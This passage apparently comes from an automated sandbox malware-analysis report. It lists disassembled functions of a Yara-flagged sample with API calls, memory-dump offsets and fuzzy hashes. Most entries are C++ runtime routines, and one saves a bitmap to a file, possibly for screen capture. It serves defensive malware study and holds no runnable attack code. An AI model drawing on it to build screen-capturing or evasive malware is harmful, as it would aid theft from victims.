Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 0248C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0248C401
int.LIBCPMT ref: 0248C418

Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE

std::locale::_Getfacet.LIBCPMT ref: 0248C421
std::_Facet_Register.LIBCPMT ref: 0248C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0248C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0248C486

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 080d1e1ab3d2e7bfcfc859a30103bf800f74dfddc59c058dfe66ee1bff4fa622
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 4411E5719102289BCF19FB65C844AFD7776AF40714F10051FE811BB290DF748A41CFA0

Function 02484E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02484E8C
int.LIBCPMT ref: 02484EA3

Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE

std::locale::_Getfacet.LIBCPMT ref: 02484EAC
std::_Facet_Register.LIBCPMT ref: 02484EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02484EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02484F11

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: c9fed2677125e939422074f424157d3a327a9436136dc500938c97e5e74ffdec
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: CA11CE329102299BCF15FBA5D800AEE77B2AF44314F14051FE911B7290EF749A01CF90

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

CorExitProcess, xrefs: 0042FF0F
mscoree.dll, xrefs: 0042FEFD

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 024C08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 024C08F8
make_shared.LIBCPMT ref: 024C0943

Strings

v)D, xrefs: 024C08F3
MOC, xrefs: 024C091B
RCC, xrefs: 024C092A

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: d89199b3ae4fef76cffa81a27c3a1dc02c5c22ed7ca3ae60add89021205471e6
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 1AF04FB5A00614DFDF5AFF69C41076D3B69BF22B04F5A909BF4405B2A0CB785988CFA1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 024AB36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: b27f609adf0015fc56f8b9ea66ec14800685be707f0b7ec8525cc07e8f04d9f6
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: FC71D271900216DBDB21CF99C8A4ABFBBB5FF7532CF54422BE41157280DB718982CBA0

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 024B0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940

_free.LIBCMT ref: 024B0DB6
_free.LIBCMT ref: 024B0DCD
_free.LIBCMT ref: 024B0DEC
_free.LIBCMT ref: 024B0E07
_free.LIBCMT ref: 024B0E1E

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: 3d5ce12d85e78b1ec7b6ee11579a03264736c9aab66c48f996b3922d2aa94c6f
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: 51519331A003049FDB229F2AD841BAB77F9EF48725F14556EE809D7290E731E901CBA0

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 024B1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024B17B4
_free.LIBCMT ref: 024B17D4

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: 24c77b10373240b01ca32d40b18eb60aebc2178b60da524a0c763016ee606016
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 8241DE36A002049FCB21DF79C890A9EB7E6EF88714B1545AAE909EB381D731E901CB90

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 0249B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0249B152

Part of subcall function 02491188: _SpinWait.LIBCONCRT ref: 024911A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0249B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0249B198
List.LIBCMT ref: 0249B21B
List.LIBCMT ref: 0249B22A

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: a858becbfef2f2573ea93ae7eeb81ac6a0ebc75d52e539bd824adb0aaf9d6891
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 79316432A00616DFCF11EFA5E9816EEBBB2FF04348B04406FC8156B680CB716A44CF90

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 024850C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 024850A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024850B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
__Getcoll.LIBCPMT ref: 0248512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: d8405f890bf42eb45cf1f74c1b39c6b03fa0b3ce4559dc9160be1f10f8ab27f2
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: DB2189B2824204AFDB05FFA5C484BEDBBB1BF50715F91800FE485AB280EB749544CFA1

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 024B21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0248DAD7,0248DAD7,00000002,024AED35,024B3951,00000000,?,024A6A05,00000002,00000000,00000000,00000000,?,0248CF88,0248DAD7,00000004), ref: 024B21CA
_free.LIBCMT ref: 024B21FF
_free.LIBCMT ref: 024B2226
SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B2233
SetLastError.KERNEL32(00000000,?,0248DAD7), ref: 024B223C

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 9f751a2d77698e7bc85e95714a32160c9d74b9882ae28fb9d16b69a7154dee3e
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: DC01D6366457007B931BAB365C44EEB262AAFD1B72B10012BFC15D6391EFE089128539

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 024B2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
_free.LIBCMT ref: 024B2178
_free.LIBCMT ref: 024B21A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 37aa7fd9bfcec6ab2cbedbe0f568f767f4d3db8be227dfbee11a694161e908fe
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: D0F0A9352447003BD3176736AC08BDB262A5FC2F62F15022BFD19923A0EFE18512853A

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
